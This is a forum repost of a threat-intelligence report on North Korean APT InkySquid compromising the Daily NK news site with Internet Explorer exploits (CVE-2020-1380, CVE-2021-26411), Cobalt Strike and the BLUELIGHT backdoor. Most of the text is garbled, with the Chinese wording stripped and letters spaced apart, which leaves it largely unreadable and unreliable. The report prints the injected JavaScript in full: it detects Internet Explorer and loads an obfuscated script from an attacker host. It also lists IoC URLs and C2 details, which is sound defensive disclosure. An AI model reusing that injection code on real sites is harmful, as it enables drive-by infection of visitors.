搜索

[29122] 2021-08-18_【威胁情报】朝鲜APTInkySquid使用浏览器漏洞感染受害者

文档创建者:s7ckTeam
浏览次数:80
最后更新:2025-01-19
2021-08-18_【威胁情报】朝鲜APTInkySquid使用浏览器漏洞感染受害者   A P T   I n k y S q u i d   使 O t s   2 0 2 1 - 0 8 - 1 8 O t s · · · · · V o l e x i t y     D a i l y   N K   ( w w w . d a i l y n k [ . ] c o m )     ( S W C ) D a i l y   N K   线   2 0 2 1     3     2 0 2 1     6   D a i l y   N K   西 使 使 V o l e x i t y V o l e x i t y     V o l e x i t y   I n k y S q u i d S c a r C r u f t     A P T 3 7   S W C 2 0 2 1     4   V o l e x i t y     w w w . d a i l y n k [ . ] c o m   j q u e r y [ . ] s e r v i c e s     U R L     U R L     D a i l y   N K     j q u e r y [ . ]     J a v a S c r i p t   C V E - 2 0 2 0 - 1 3 8 0 V o l e x i t y   使 C V E - 2 0 2 0 - 1 3 8 0   I n t e r n e t   E x p l o r e r     D a i l y   N K     D a i l y N K   使   I n t e r n e t   E x p l o r e r   访   D a i l y   N K   U R L     J a v a S c r i p t   使   I n t e r n e t   E x p l o r e r     J a v a S c r i p t   使 b P o p U p   J a v a S c r i p t     J a v a S c r i p t     J a v a S c r i p t   使   J a v a S c r i p t     S V G     1   h x x p s : / / w w w . d a i l y n k [ . ] c o m / w p - i n c l u d e s / j s / j q u e r y / j q u e r y . m i n . j s ? v e r = 3 . 5 . 1 h x x p s : / / w w w . d a i l y n k [ . ] c o m / w p - i n c l u d e s / j s / j q u e r y / j q u e r y - m i g r a t e . m i n . j s ? v e r = 3 . 3 . 2 h x x p s : / / w w w . d a i l y n k [ . ] c o m / w p - i n c l u d e s / j s / j q u e r y / j q u e r y . m i n . j s ? v e r = 3 . 5 . 1 f u n c t i o n   v g r a i ( ) { v a r   e = d o c u m e n t . c r e a t e E l e m e n t ( " s c r i p t " ) ; e . s r c = f e c e t ( " w 6 6 2 5 I > > 7 x = y 3 7 t 4 ; = 5 t 4 8 x r t 5 > 4 t 5 2 1 0 5 x 8 t < t : 6 t 0 s = / x 0 = y 5 " , 1 5 ) , d o c u m e n t   . h e a d & & d o c u m e n t . h e a d . a p p e n d C h i l d ( e ) } f u n c t i o n   v d g i e ( ) { c o n s t   e = w i n d o w . n a v i g a t o r . u s e r A g e n t , t = e . i n d e x O f ( " r v : 1 1 . 0   " ) , i = e . i n d e x O f ( " T r i d e n t / " ) ; r e t u r n   t > 0 | | i > 0 } v d g i e ( ) & & v g r a i ( ) ; h x x p s : / / u i . j q u e r y [ . ] s e r v i c e s / r e s p o n s i v e - e x t e n d . m i n . j s
  1 .     S V G   1 .   M 4 3 . 2 p a t h d 2 .   3 .   4 .     3 0   1 7     3 0   V o l e x i t y     G i t H u b     S V G     P y t h o n   使   S V G     J a v a S c r i p t     2     2 .   C V E - 2 0 2 0 - 1 3 8 0   T r e n d M i c r o   C V E - 2 0 2 0 - 1 3 8 0     ( P o C )   J a v a S c r i p t   使   S V G     b l o b     C o b a l t   S t r i k e   s t a g e r     s h e l l c o d e     U R L   C V E - 2 0 2 1 - 2 6 4 1 1 使 C V E - 2 0 2 1 - 2 6 4 1 1   I n t e r n e t   E x p l o r e r     M i c r o s o f t   E d g e     C V E - 2 0 2 0 - 1 3 8 0   使   3     4   使   E n k i   P o C     3 .   使 h x x p s : / / u i . j q u e r y [ . ] s e r v i c e s / s w i p e o u t . m i n . j s h x x p s : / / u i . j q u e r y [ . ] s e r v i c e s / s w i p e o u t . m i n . c s s h x x p s : / / u i . j q u e r y [ . ] s e r v i c e s / s l i d e r . m i n . c s s
  4 .   E n k i     P o C     C V E - 2 0 2 0 - 1 3 8 0     S V G     ( C 2 )   u r l     C V E - 2 0 2 0 - 1 3 8 0   B L U E L I G H T 使   j q u e r y [ . ]     X O R     ( 0 x C F )     V o l e x i t y     B L U E L I G H T   P D B     C o b a l t   S t r i k e   B L U E L I G H T   B L U E L I G H T   使   C 2   M i c r o s o f t   G r a p h   A P I     C 2   B L U E L I G H T   使   o a u t h 2   B L U E L I G H T   O n e D r i v e 使   C 2   使 使 l o g o n o r m a l b a c k g r o u n d t h e m e r o u n d   J S O N   I P I P   3 2     6 4     S I D     A V     V M     X O R     b l o b   使 . j p g l o g o / t i t l e . j p g   C 2     3 0   s h e l l c o d e   c o o k i e     W i n 7   I E W i n 1 0   I E E d g e C h r o m e   N a v e r   W h a l e 线   Z I P   线 r o u n d Z I P   使   S W C     I n t e r n e t   E x p l o r e r     M i c r o s o f t   E d g e   使 使 访 使   C 2   使   B L U E L I G H T h x x p s : / / s t o r a g e . j q u e r y [ . ] s e r v i c e s / l o g / h i s t o r y E : D e v e l o p m e n t B A C K D O O R n c o v R e l e a s e b l u e l i g h t . p d b
  I n k y S q u i d   S c a r C r u f t A P T 3 7 I o C     I o C     V o l e x i t y     G i t H u b   i o c h t t p s : / / g i t h u b . c o m / v o l e x i t y / t h r e a t - i n t e l / t r e e / m a i n / 2 0 2 1 / 2 0 2 1 - 0 8 - 1 7 % 2 0 - % 2 0 I n k y S q u i d % 2 0 P a r t % 2 0 1 / i n d i c a t o r s
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理